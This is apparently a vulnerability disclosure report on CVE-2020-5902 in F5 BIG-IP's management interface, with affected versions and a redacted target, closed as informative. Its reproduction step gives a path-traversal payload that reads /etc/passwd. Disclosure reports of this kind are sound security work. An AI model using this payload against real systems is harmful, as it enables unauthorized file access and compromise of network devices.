CVE-2020-5902
Critical
A
AWS VDP
Submitted None
Actions:
Reported by
perigou
Vulnerability Details
Technical details and impact analysis
**CVE ID: ** CVE-2020-5902
**Description:**
Affected Product: F5 BIG-IP Traffic Management User Interface (TMUI)
Severity: Critical
CVSS Score: 9.8
Description: Remote Code Execution (RCE) vulnerability in undisclosed pages of the TMUI
CVE-2020-5902 is a critical vulnerability affecting the BIG-IP Traffic Management User Interface (TMUI), also known as the Configuration utility. This vulnerability allows for Remote Code Execution (RCE) in undisclosed pages of the TMUI.
Affected Versions
BIG-IP versions ████
BIG-IP versions █████
BIG-IP versions ███
BIG-IP versions ███
BIG-IP versions ███
## Steps To Reproduce:
## URL :
███
payload used :/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd
Full URL:
█████████?fileName=/etc/passwd
## Impact
## Summary:
The vulnerability can be exploited by an attacker to execute arbitrary code on the affected system, leading to unauthorized access, data breaches, and system compromise.
Related CVEs
Associated Common Vulnerabilities and Exposures
CVE-2020-5902
UNKNOWN
In BIG-IP versions 15.0.0-15.1.0.3, 14.1.0-14.1.2.5, 13.1.0-13.1.3.3, 12.1.0-12.1.5.1, and 11.6.1-11.6.5.1, the Traffic Management User Interface (TMUI), also referred to as the Configuration utility, has a Remote Code Execution (RCE) vulnerability in undisclosed pages.
Report Details
Additional information and metadata
State
Closed
Substate
Informative
Submitted
Weakness
Using Components with Known Vulnerabilities